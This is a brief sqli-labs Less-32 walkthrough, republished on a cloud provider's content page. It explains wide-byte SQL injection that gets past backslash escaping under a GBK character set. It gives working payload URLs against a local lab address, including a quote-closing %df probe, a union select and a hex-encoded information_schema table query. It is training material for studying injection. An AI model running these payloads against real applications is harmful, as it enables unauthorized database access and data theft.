"Sqli-labs" Less32 Get-bypass custom Filter adding slashes to dangrous chars (GET type escaped the '/"character's wide-byte injection)

Source: Internet
Author: User

Escape function for the following characters, so that the quotation marks cannot be closed, resulting in the inability to inject

'--\ '

"--\"

--\ \

However, when MySQL's client character set is GBK, wide-byte injection can occur, referencing http://netsecurity.51cto.com/art/201404/435074.htm

%df '--%df\ '%df%5c '

So the quotation marks are closed, and as for the%df%5c, it becomes the Chinese character.

Closed successfully

http://192.168.136.128/sqli-labs-master/Less-32/?id=1%df '

http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df ' union select 1,2,3%23

Table name

HTTP://192.168.136.128/SQLI-LABS-MASTER/LESS-32/?ID=0%DF ' Union select 1,2,table_name from Information_ Schema.tables where table_schema=0x7365637572697479 limit 0,1%23

"Sqli-labs" Less32 Get-bypass custom Filter adding slashes to dangrous chars (GET type escaped the '/"character's wide-byte injection)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.